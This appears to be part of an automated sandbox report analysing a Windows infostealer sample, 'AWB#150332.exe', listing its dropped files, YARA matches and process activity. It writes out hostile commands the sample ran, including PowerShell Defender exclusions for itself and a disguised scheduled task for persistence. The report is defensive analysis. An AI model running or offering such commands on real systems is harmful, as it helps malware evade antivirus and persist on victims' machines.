                    Source: AWB#150332.exe, 00000000.00000002.1279870899.0000000007420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs AWB#150332.exe
                    Source: AWB#150332.exe, 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename303ccb5a-e74e-425a-949b-a0bf6563c022.exe4 vs AWB#150332.exe
                    Source: AWB#150332.exe, 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs AWB#150332.exe
                    Source: AWB#150332.exe, 00000000.00000002.1258173545.00000000031A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename303ccb5a-e74e-425a-949b-a0bf6563c022.exe4 vs AWB#150332.exe
                    Source: AWB#150332.exe, 00000000.00000002.1258173545.00000000031A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs AWB#150332.exe
                    Source: AWB#150332.exe, 00000000.00000002.1280192882.0000000007540000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs AWB#150332.exe
                    Source: AWB#150332.exe, 00000000.00000000.1219099995.0000000000D92000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameyOCXb.exe. vs AWB#150332.exe
                    Source: AWB#150332.exeBinary or memory string: OriginalFilenameyOCXb.exe. vs AWB#150332.exe
                    Source: AWB#150332.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: AWB#150332.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: nYNBzxFhCu.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, Tk7F6W0v.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, Tk7F6W0v.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, Tk7F6W0v.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, Tk7F6W0v.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, ivMw3WGb8.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, ivMw3WGb8.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, cdw.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, cdw.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, yoMJA2saKUL4yKFFtX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, yoMJA2saKUL4yKFFtX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/19@1/1
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile created: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFFF1.tmpJump to behavior
                    Source: AWB#150332.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: AWB#150332.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: AWB#150332.exeReversingLabs: Detection: 26%
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile read: C:\Users\user\Desktop\AWB#150332.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\AWB#150332.exe "C:\Users\user\Desktop\AWB#150332.exe"
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
